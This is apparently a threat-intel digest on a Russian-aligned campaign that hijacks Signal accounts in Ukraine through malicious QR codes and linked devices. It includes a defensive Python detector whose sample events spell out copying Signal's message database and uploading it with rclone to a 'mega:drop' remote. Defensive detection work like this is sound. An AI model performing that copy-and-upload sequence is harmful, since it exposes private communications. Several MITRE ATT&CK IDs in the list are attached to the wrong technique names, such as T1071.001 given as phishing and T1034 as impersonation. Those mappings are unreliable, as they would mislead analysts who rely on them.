A new fraudulent campaign targeting Signal Messenger accounts has emerged, using malicious QR codes to hijack users' accounts. Attackers abuse the platform's linked devices feature, which lets them intercept messages in real time once a rogue device is linked. The surge in this activity is believed to be tied to wartime demand for sensitive communications and primarily affects users in Ukraine.
Affected: Signal Messenger, users in Ukraine, government and military communications
Key points:
- Malicious QR codes are used to gain unauthorized access to Signal accounts.
- Attackers exploit Signal’s linked devices feature for real-time message interception.
- Russian-aligned threat actors are particularly active, targeting users of interest to Russian intelligence.
- Phishing techniques are employed to distribute malicious QR codes disguised as legitimate links.
- Malware is also being used to exfiltrate Signal database files from compromised devices.
- Security risks associated with QR codes can lead to inadvertent compromises due to users’ lack of scrutiny.
- Recommendations for users include verifying QR code sources and initiating device linking through official app settings.
MITRE Techniques:
- Initial Access (T1071.001) – Phishing techniques are used to distribute malicious QR codes
- Credential Dumping (T1003.001) – Malware like WAVESIGN extracts messages from Signal databases on compromised Windows devices
- Data Exfiltration (T1041) – Rclone is used to upload the extracted data over the network
- Exploitation of Remote Services (T1133) – Malicious QR codes exploit the linked devices feature to gain access to user messages
- Impersonation (T1034) – Legitimate Signal group invites are modified to redirect users to adversary-controlled URLs
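The last two key points and the WAVESIGN/Rclone techniques above describe a host-side pattern a defender can look for: something other than Signal itself reading the Signal Desktop message database, followed by an rclone transfer to a remote. The script below is an added illustration of that detection logic, not code from the article or from Signal. It assumes Sysmon-style process-creation fields (`Computer`, `Image`, `CommandLine`) and that Signal Desktop on Windows keeps its message store at `%APPDATA%\Signal\sql\db.sqlite`; the sample events are constructed, not real telemetry.

```python
import re

# Assumed, not from the article: Signal Desktop stores its message database at
# %APPDATA%\Signal\sql\db.sqlite, and events carry Sysmon Event ID 1 field names.
SIGNAL_DB_RE = re.compile(r"\\appdata\\roaming\\signal\\sql\\db\.sqlite", re.I)
SIGNAL_DIR_RE = re.compile(r"\\appdata\\roaming\\signal\\", re.I)
# rclone remote syntax is "<remote>:<path>"; require 2+ chars so "C:\" does not match.
REMOTE_SPEC_RE = re.compile(r"\s[\w-]{2,}:\S*")
RCLONE_NAMES = {"rclone.exe", "rclone"}
EXPECTED_DB_READERS = {"signal.exe"}  # only Signal itself should open its own database


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Classify one process-creation event.

    Returns (kind, severity, reason) or None when the event is uninteresting.
    """
    name = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if SIGNAL_DB_RE.search(cmd) and name not in EXPECTED_DB_READERS:
        return ("db_access", "medium", f"{name} accessed Signal db.sqlite")
    if name in RCLONE_NAMES:
        if SIGNAL_DIR_RE.search(cmd):
            return ("rclone_signal_dir", "high", "rclone operating on the Signal data directory")
        if REMOTE_SPEC_RE.search(cmd):
            return ("rclone_remote", "low", "rclone transfer to a remote")
    return None


def detect(events, window_s=600):
    """Scan events in time order and correlate per host.

    A plain rclone transfer is low severity on its own; it is escalated to high
    when the same host showed a Signal database access within window_s seconds.
    """
    findings = []
    last_db_access = {}  # host -> timestamp of the most recent Signal DB access
    for ev in sorted(events, key=lambda e: e["ts"]):
        hit = classify(ev)
        if hit is None:
            continue
        kind, severity, reason = hit
        host = ev["Computer"]
        if kind == "db_access":
            last_db_access[host] = ev["ts"]
        elif kind == "rclone_remote" and host in last_db_access \
                and ev["ts"] - last_db_access[host] <= window_s:
            severity = "high"
            reason += " shortly after a Signal database access"
        findings.append({"ts": ev["ts"], "host": host, "severity": severity, "reason": reason})
    return findings


# Constructed sample events (not real telemetry), timestamps in seconds.
SAMPLE_EVENTS = [
    {"ts": 100, "Computer": "WS01",
     "Image": r"C:\Users\a\AppData\Local\Programs\signal-desktop\Signal.exe",
     "CommandLine": r'"C:\Users\a\AppData\Local\Programs\signal-desktop\Signal.exe"'},
    {"ts": 200, "Computer": "WS01", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c copy "C:\Users\a\AppData\Roaming\Signal\sql\db.sqlite" '
                    r"C:\Users\a\AppData\Local\Temp\s.db"},
    {"ts": 260, "Computer": "WS01", "Image": r"C:\Users\a\AppData\Local\Temp\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Users\a\AppData\Local\Temp\s.db mega:drop"},
    {"ts": 300, "Computer": "WS02", "Image": r"C:\Tools\rclone\rclone.exe",
     "CommandLine": r"rclone.exe sync D:\backup gdrive:backups"},
    {"ts": 400, "Computer": "WS03", "Image": r"C:\Users\b\Downloads\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Users\b\AppData\Roaming\Signal\ mega:b"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['ts']:>5} {f['host']} {f['severity']:<6} {f['reason']}")
```

The legitimate backup job on WS02 stays at low severity because nothing on that host touched the Signal database first; the copy-then-rclone sequence on WS01 is what gets escalated. In production the same logic would consume EDR or Sysmon output rather than the embedded list, and the expected-reader allowlist would be extended with any backup agent that is known to open the Signal directory.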
Full Story: https://gridinsoft.com/blogs/signal-linked-devices-hack/